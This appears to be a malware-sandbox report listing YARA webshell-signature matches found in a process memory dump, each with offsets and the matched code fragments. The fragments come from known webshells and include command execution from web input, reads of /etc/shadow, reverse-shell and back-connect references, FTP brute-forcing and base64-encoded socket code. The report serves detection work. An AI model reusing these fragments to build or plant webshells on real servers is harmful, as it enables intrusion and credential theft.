- 0x36d66:$s3: newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JspWebshell_1_2_jsp | Semi-Auto-generated - file JspWebshell 1.2.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2a34a:$s0: JspWebshell
- 0x2a3a0:$s0: JspWebshell
- 0x36db7:$s0: JspWebshell
- 0x36df3:$s0: JspWebshell
- 0x36e75:$s0: JspWebshell
- 0x40e55:$s0: JspWebshell
- 0x40e95:$s0: JspWebshell
- 0x44343:$s0: JspWebshell
- 0x44385:$s0: JspWebshell
- 0x36e85:$s1: CreateAndDeleteFolder is error:
- 0x40f3b:$s1: CreateAndDeleteFolder is error:
- 0x4442b:$s1: CreateAndDeleteFolder is error:
- 0x36ea9:$s2: <td width="70%" height="22"> <%=env.queryHashtable("java.c
- 0x36eed:$s3: String _password ="111";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Sincap_php_php | Semi-Auto-generated - file Sincap.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x36fba:$s0: $baglan=fopen("/tmp/$ekinci",'r');
- 0x36fe1:$s2: $tampon4=$tampon3-1
- 0x36ff9:$s3: @aventgrup.net
- 0x3eb34:$s3: @aventgrup.net
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Test_php_php | Semi-Auto-generated - file Test.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x370b8:$s0: $yazi = "test" . "\r\n";
- 0x4faf3:$s0: $yazi = "test" . "\r\n";
- 0x370d5:$s2: fwrite ($fp, "$yazi");
- 0x4fb10:$s2: fwrite ($fp, "$yazi");
- 0x370f0:$s3: $entry_line="HACKed by EntriKa";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Phyton_Shell_py | Semi-Auto-generated - file Phyton Shell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x371c7:$s1: sh_out=os.popen(SHELL+" "+cmd).readlines()
- 0x371f6:$s2: # d00r.py 0.3a (reverse|bind)-shell in python by fQ
- 0x37230:$s3: print "error; help: head -n 16 d00r.py"
- 0x3725c:$s4: print "PW:",PW,"PORT:",PORT,"HOST:",HOST
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_tool_php_php | Semi-Auto-generated - file mysql_tool.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37341:$s0: $error_text = '<strong>Failed selecting database "'.$this->db['
- 0x32f01:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x37385:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x454a3:$s1: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERV
- 0x373ce:$s4: <div align="center">The backup process has now started<br
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Zehir_4_asp | Semi-Auto-generated - file Zehir 4.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x374b7:$s2: </a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time=
- 0x37506:$s4: <input type=submit value="Test Et!" onclick="
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sh_php_php | Semi-Auto-generated - file sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x375e0:$s1: $ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e
- 0x37635:$s2: Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpbackdoor15_php | Semi-Auto-generated - file phpbackdoor15.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3773f:$s1: echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["na
- 0x37785:$s2: if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FI
- 0x377ce:$s3: echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpjackal_php | Semi-Auto-generated - file phpjackal.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x378ce:$s3: $dl=$_REQUEST['downloaD'];
- 0x378ed:$s4: else shelL("perl.exe $name $port");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sql_php_php | Semi-Auto-generated - file sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x379bf:$s1: fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#
- 0x32292:$s2: http://rst.void.ru
- 0x379ee:$s2: http://rst.void.ru
- 0x37a0a:$s2: http://rst.void.ru
- 0x1b3d8:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x37a21:$s3: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cgi_python_py | Semi-Auto-generated - file cgi-python.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37b19:$s0: a CGI by Fuzzyman
- 0x37b2f:$s1: """+fontline +"Version : " + versionstring + """, Running on : """ +
- 0x37b79:$s2: values = map(lambda x: x.value, theform[field]) # allows for
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ru24_post_sh_php_php | Semi-Auto-generated - file ru24_post_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37c7a:$s1: <title>Ru24PostWebShell - ".$_POST['cmd']."</title>
- 0x37cb2:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x408e0:$s3: if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a
- 0x37d04:$s4: Writed by DreAmeRz
- 0x40947:$s4: Writed by DreAmeRz
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DTool_Pro_php | Semi-Auto-generated - file DTool Pro.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37dc9:$s0: r3v3ng4ns\nDigite
- 0x3e2fb:$s0: r3v3ng4ns\nDigite
- 0x37ddf:$s1: if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permissi
- 0x37e33:$s3: if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnetd_pl | Semi-Auto-generated - file telnetd.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x37f2a:$s0: 0ldW0lf
- 0x37f36:$s1: However you are lucky :P
- 0x37f53:$s2: I'm FuCKeD
- 0x37f62:$s3: ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#
- 0x37fa0:$s4: atrix@irc.brasnet.org
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | php_include_w_shell_php | Semi-Auto-generated - file php-include-w-shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3807c:$s0: $dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd
- 0x380d0:$s1: if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38121:$s0: Safe0ver
- 0x3817a:$s0: Safe0ver
- 0x38219:$s0: Safe0ver
- 0x38226:$s1: Script Gecisi Tamamlayamadi!
- 0x38247:$s2: document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shell_php_php | Semi-Auto-generated - file shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3834a:$s1: /* We have found the parent dir. We must be carefull if the parent
- 0x38392:$s2: $tmpfile = tempnam('/tmp', 'phpshell');
- 0x383be:$s3: if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnet_cgi | Semi-Auto-generated - file telnet.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x416c0:$s0: www.rohitab.com
- 0x32a4d:$s1: W A R N I N G: Private Server
- 0x384ae:$s1: W A R N I N G: Private Server
- 0x384d0:$s2: print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
- 0x3850f:$s3: $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $C
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ironshell_php | Semi-Auto-generated - file ironshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x385fe:$s0: www.ironwarez.info
- 0x38615:$s1: $cookiename = "wieeeee";
- 0x38632:$s2: ~ Shell I
- 0x3e424:$s2: ~ Shell I
- 0x38640:$s3: www.rootshell-team.info
- 0x3865c:$s4: setcookie($cookiename, $_POST['pass'], time()+3600);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backdoorfr_php | Semi-Auto-generated - file backdoorfr.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38745:$s1: www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan
- 0x3879a:$s2: print("<br>Provenance du mail : <input type=\"text\" name=\"provenanc
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | aspydrv_asp | Semi-Auto-generated - file aspydrv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38894:$s0: If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
- 0x12c9:$s1: password
- 0x2d23:$s1: password
- 0x355f:$s1: password
- 0x35cf:$s1: password
- 0xaa43:$s1: password
- 0xaa5b:$s1: password
- 0xef8d:$s1: password
- 0x11fab:$s1: password
- 0x12475:$s1: password
- 0x12657:$s1: password
- 0x12708:$s1: password
- 0x1a970:$s1: password
- 0x1ad07:$s1: password
- 0x1d0c0:$s1: password
- 0x1d0ee:$s1: password
- 0x20519:$s1: password
- 0x21223:$s1: password
- 0x28cf6:$s1: password
- 0x2a58f:$s1: password
- 0x2a5b8:$s1: password
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | cmdjsp_jsp | Semi-Auto-generated - file cmdjsp.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x389b8:$s0: // note that linux = cmd and windows = "cmd.exe /c + cmd"
- 0x241dc:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x389f7:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x21bdc:$s2: cmdjsp.jsp
- 0x21c8c:$s2: cmdjsp.jsp
- 0x24145:$s2: cmdjsp.jsp
- 0x24235:$s2: cmdjsp.jsp
- 0x3893f:$s2: cmdjsp.jsp
- 0x38a37:$s2: cmdjsp.jsp
- 0x30b69:$s3: michaeldaw.org
- 0x31813:$s3: michaeldaw.org
- 0x33e7e:$s3: michaeldaw.org
- 0x38a46:$s3: michaeldaw.org
- 0x4186e:$s3: michaeldaw.org
- 0x41895:$s3: michaeldaw.org
- 0x41f95:$s3: michaeldaw.org
- 0x41fbc:$s3: michaeldaw.org
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | - 0x1b0d3:$s0: h4ntu shell
- 0x38a9b:$s0: h4ntu shell
- 0x38b27:$s0: h4ntu shell
- 0x3f0b1:$s0: h4ntu shell
- 0x3f159:$s0: h4ntu shell
- 0x38b37:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Ajan_asp | Semi-Auto-generated - file Ajan.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x23ca2:$s1: c:\downloaded.zip
- 0x25b51:$s1: c:\downloaded.zip
- 0x38c27:$s1: c:\downloaded.zip
- 0x38c3d:$s2: Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
- 0x38c7a:$s3: http://www35.websamba.com/cybervurgun/
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHANTASMA_php | Semi-Auto-generated - file PHANTASMA.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x38d53:$s0: >[*] Safemode Mode Run</DIV>
- 0x38d74:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x38dc5:$s2: [*] Spawning Shell
- 0x38ddc:$s3: Cha0s
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | MySQL_Web_Interface_Version_0_8_php | Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33f8d:$s0: SooMin Kim
- 0x38ec0:$s0: SooMin Kim
- 0x38ecf:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x38ef8:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x38f41:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | simple_cmd_html | Semi-Auto-generated - file simple_cmd.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39048:$s1: <title>G-Security Webshell</title>
- 0x4575a:$s1: <title>G-Security Webshell</title>
- 0x3906f:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x4571e:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x390ab:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x45781:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x390db:$s4: <? $cmd = $_REQUEST["-cmd"];?>
- 0x457b1:$s4: <? $cmd = $_REQUEST["-cmd"];?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0001 | Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3922d:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x39279:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0002 | Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3940e:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x39463:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x394b7:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0003 | Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3965d:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x396b2:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0004 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3985b:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x398a6:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0005 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39a9d:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x39aef:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0006 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39cdb:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
- 0x39d2e:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x39d81:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0007 | Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x39f17:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x39f6a:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0008 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a14c:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x3a19e:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x3a1ef:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x3a240:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0009 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a44e:$s0: $sess_data["cut"] = array(); c99_s
- 0x3a475:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0010 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3927e:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x3a621:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x3a664:$s2: c99sh_sqlquery
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0011 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3a7ff:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x3a850:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0012 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x27a0a:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x27a5b:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x3aa09:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x27a35:$s1: .$arrow."</b>",in('text','
- 0x3aa35:$s1: .$arrow."</b>",in('text','
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0013 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3abab:$s0: 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
- 0x3abe9:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x32299:$s2: rst.void.ru
- 0x379f5:$s2: rst.void.ru
- 0x37a11:$s2: rst.void.ru
- 0x3ac16:$s2: rst.void.ru
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0014 | Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3adb9:$s0: echo ws(2).$lb." <a
- 0x3add1:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x4d4b0:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3ae07:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3afe8:$s0: if(eregi("./shbd $por",$scan))
- 0x3b00b:$s1: $_POST['backconnectip']
- 0x55e36:$s1: $_POST['backconnectip']
- 0x3b027:$s2: $_POST['backcconnmsg']
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0016 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b219:$s1: if(rmdir($_POST['mk_name']))
- 0x3b23a:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x3b28d:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0017 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b481:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x3b4b3:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x3b4fe:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_php_webshells | Semi-Auto-generated - from files multiple_php_webshells | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ab50:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b73b:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3b790:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x3b7e5:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0019 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3b99d:$s0: <b>Dumped! Dump has been writed to
- 0x3b9c5:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x3ba19:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0020 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3bbdf:$s0: @ini_set("highlight
- 0x3bbf7:$s1: echo "<b>Result of execution this PHP-code</b>:<br>";
- 0x3bc31:$s2: {$row[] = "<b>Owner/Group</b>";}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0021 | Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3bdd7:$s2: echo $uname."</font><br><b>";
- 0x3bdf9:$s3: while(!feof($f)) { $res.=fread($f,1024); }
- 0x3be28:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0022 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c006:$s0: c99ftpbrutecheck
- 0x3c01b:$s1: $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
- 0x3c053:$s2: $fqb_lenght = $nixpwdperpage;
- 0x3c075:$s3: $sock = @ftp_connect($host,$port,$timeout);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0023 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c224:$s0: $sqlquicklaunch[] = array("
- 0x3c244:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0024 | Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c3f9:$s0: if(@$_POST['save'])writef($file,$_POST['data']);
- 0x3c42e:$s1: if($action=="phpeval"){
- 0x3c44a:$s2: $uploadfile = $dirupload."/".$_POST['filename'];
- 0x3c47f:$s3: $dir=getcwd()."/";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0025 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c5e7:$s3: if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0026 | Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c78c:$s0: if ($filename != "." and $filename != ".."){
- 0x4844c:$s0: if ($filename != "." and $filename != ".."){
- 0x3c7bd:$s1: $dires = $dires . $directory;
- 0x3c7df:$s4: $arr = array_merge($arr, glob("*"));
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0027 | Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3c9a7:$s0: @$rto=$_POST['rto'];
- 0x3c9c0:$s2: SCROLLBAR-TRACK-COLOR: #91AAFF
- 0x3c9e3:$s3: $to1=str_replace("//","/",$to1);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | multiple_webshells_0028 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3cba4:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
